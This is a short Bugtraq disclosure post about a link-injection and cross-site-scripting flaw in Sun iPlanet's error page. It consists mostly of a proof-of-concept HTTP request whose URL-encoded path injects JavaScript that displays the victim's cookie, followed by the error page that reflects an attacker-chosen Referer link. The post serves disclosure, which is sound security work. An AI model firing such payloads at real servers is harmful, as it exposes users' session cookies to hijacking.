Bugtraq mailing list archives
Sun iPlanet Error Page Link Injection
From: BugsNotHugs <bugsnothugs () gmail com>
Date: Sat, 30 Jun 2012 16:11:32 -0600
Sun iPlanet Error Page Link Injectionknown about long time, but no CVE! probably because this really lame vulnerability! some security pro will say this good for social engineering and give cyberwar example!
GET/%27%29%3b%61%6c%65%72%74%28%27%58%53%53%5c%72%5c%72%27%2b%27%4c%6f%63%61%74%69%6f%6e%3a%20%27%2b%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2b%27%5c%72%43%6f%6f%6b%69%65%3a%20%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%2f%2f%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d%3d HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://exploit-db.com/ Accept-Language: en-us Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4321; InfoPath.2; .NET CLR 2.0.50737) Host: target.server Cache-Control: no-cache Cookie: ARPT=MyCoOkIe Connection: close <HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD><H1>Not Found</H1> The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it. Please inform the site administrator of the <A HREF="https://exploit-db/">referring page</A>.
Current thread:
- Sun iPlanet Error Page Link Injection BugsNotHugs (Jul 02)